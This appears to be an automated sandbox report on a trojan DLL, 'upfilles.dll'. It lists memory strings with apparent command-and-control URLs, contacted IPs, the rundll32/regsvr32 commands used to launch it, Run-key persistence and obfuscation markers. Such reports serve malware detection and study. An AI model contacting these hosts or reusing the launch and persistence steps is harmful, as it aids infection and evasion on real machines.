Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php4
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpP
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/f
Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000016.00000000.1859052974.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000016.00000002.2945734291.000000000C54A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspacin.cloud/
Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspacin.cloud/live/
Source: explorer.exe, 00000016.00000002.2943554599.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspacin.cloud/live/0vaH
Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspacin.cloud/live/6
Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspacin.cloud/live/J5
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800012B0 NtConnectPort,NtRequestWaitReplyPort,NtRequestPort,	6_2_00000001800012B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180001490 NtCreateSection,LocalAlloc,LocalAlloc,NtConnectPort,NtRequestWaitReplyPort,	6_2_0000000180001490
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180001650 RtlInitUnicodeString,NtClose,NtClose,RtlNtStatusToDosError,SetLastError,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_0000000180001650
Source: C:\Windows\System32\rundll32.exe	Code function: 18_3_000002921300D31C NtProtectVirtualMemory,	18_3_000002921300D31C
Source: C:\Windows\System32\rundll32.exe	Code function: 18_3_000002921300D2AC NtAllocateVirtualMemory,	18_3_000002921300D2AC
Source: C:\Windows\explorer.exe	Code function: 22_2_013A6814 NtFreeVirtualMemory,	22_2_013A6814
Source: C:\Windows\explorer.exe	Code function: 22_2_013A958C NtAllocateVirtualMemory,	22_2_013A958C
Source: C:\Windows\explorer.exe	Code function: 22_2_013AA5CC NtDelayExecution,	22_2_013AA5CC
Source: C:\Windows\explorer.exe	Code function: 22_2_013A6728 NtWriteFile,	22_2_013A6728
Source: C:\Windows\explorer.exe	Code function: 22_2_013A6618 RtlInitUnicodeString,NtCreateFile,	22_2_013A6618
Source: C:\Windows\explorer.exe	Code function: 22_2_013A650C RtlInitUnicodeString,NtCreateFile,NtClose,	22_2_013A650C
Source: C:\Windows\explorer.exe	Code function: 22_2_013A6464 RtlInitUnicodeString,NtOpenFile,NtClose,	22_2_013A6464
Source: C:\Windows\explorer.exe	Code function: 22_2_013A67A0 NtClose,	22_2_013A67A0

Detected potential crypto function

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001C030	6_2_000000018001C030
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000A040	6_2_000000018000A040
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800190AC	6_2_00000001800190AC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180001950	6_2_0000000180001950
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000B992	6_2_000000018000B992
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800131E0	6_2_00000001800131E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000E200	6_2_000000018000E200
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000B210	6_2_000000018000B210
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800192B8	6_2_00000001800192B8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180020B88	6_2_0000000180020B88
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180004C00	6_2_0000000180004C00
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180013448	6_2_0000000180013448
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001C45C	6_2_000000018001C45C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000C480	6_2_000000018000C480
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001EC90	6_2_000000018001EC90
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800154A0	6_2_00000001800154A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180023584	6_2_0000000180023584
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800176FC	6_2_00000001800176FC
Source: C:\Windows\System32\rundll32.exe	Code function: 18_2_00000292116E254C	18_2_00000292116E254C
Source: C:\Windows\System32\rundll32.exe	Code function: 18_2_000000026E7DFB4C	18_2_000000026E7DFB4C
Source: C:\Windows\explorer.exe	Code function: 22_2_013A1030	22_2_013A1030

One or more processes crash

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344

Sample file is different than original file name gathered from version info

Source: upfilles.dll.dll

Binary or memory string: OriginalFilenameeppcom64.dllZ vs upfilles.dll.dll

Source: classification engine

Classification label: mal100.troj.evad.winDLL@32/17@8/6

Source: C:\Windows\System32\rundll32.exe

Code function: 18_3_00007DF4F0240000 CreateToolhelp32Snapshot,Process32First,Process32Next,

18_3_00007DF4F0240000

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018000AEB0 CoCreateInstance,

6_2_000000018000AEB0

Source: C:\Windows\System32\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7272
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7288
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6324
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6516

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\ba1d38a4-2e70-4cdd-8ce4-6f972928d4e8

Jump to behavior

Source: upfilles.dll.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1

Source: upfilles.dll.dll

ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6516 -s 344
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7272 -s 344
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7288 -s 344
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: upfilles.dll.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: upfilles.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: upfilles.dll.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: upfilles.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: upfilles.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: upfilles.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: upfilles.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: upfilles.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

PE file contains an invalid checksum

Source: upfilles.dll.dll

Static PE information: real checksum: 0x491bb should be: 0x85fc5

PE file contains sections with non-standard names

Source: upfilles.dll.dll

Static PE information: section name: hVr

Registers a DLL

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180006138 push E8000020h; iretd	6_2_000000018000613D
Source: C:\Windows\System32\rundll32.exe	Code function: 18_2_00000292116A5BB0 push r15; ret	18_2_00000292116A5BB5
Source: C:\Windows\System32\rundll32.exe	Code function: 18_2_000000026E7A31B0 push r15; ret	18_2_000000026E7A31B5

Source: C:\Windows\System32\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\System32\rundll32.exe

6_2_0000000180023584

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
